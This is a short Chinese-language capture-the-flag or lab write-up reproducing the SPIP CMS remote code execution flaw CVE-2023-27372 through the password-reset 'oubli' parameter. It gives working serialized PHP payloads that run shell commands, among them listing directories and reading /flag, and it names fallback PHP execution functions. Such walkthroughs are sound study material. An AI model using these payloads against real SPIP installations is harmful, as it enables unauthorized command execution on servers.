CVE-2023-27372 SPIP cms V4

靶场介绍

SPIP CMS v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞

工具准备

  • Burpsuite

靶场复现

1、开启环境后,访问链接,由题目可知,是SPIP远程代码执行漏洞,该漏洞存在密码重置功能中

点击Se connecter

可以找到该重置密码地址,随便输入邮箱进行抓包,根据公开信息,出现漏洞的参数为oubli,在此处构造Payload

Payload:

oubli=s:22:"<?php system('ls'); ?>";
  • s -> 字符串格式
  • 22 -> 长度

该长度是除冒号除外的(空格也算进去),如<?php system('ls'); ?>

OK,既然可以执行命令,那么可以寻找flag了。

查看根目录是否存在flag(一般都会放在根目录的):

oubli=s:24:"<?php system('ls /'); ?>";

OK,找到了,直接查看

oubli=s:29:"<?php system('cat /flag'); ?>";

总结

如果system()被禁用,还有shell_exec()exec()passthru()等。

参考链接

posted @ 2025-02-22 18:43  4eg1s  阅读(35)  评论(0)    收藏  举报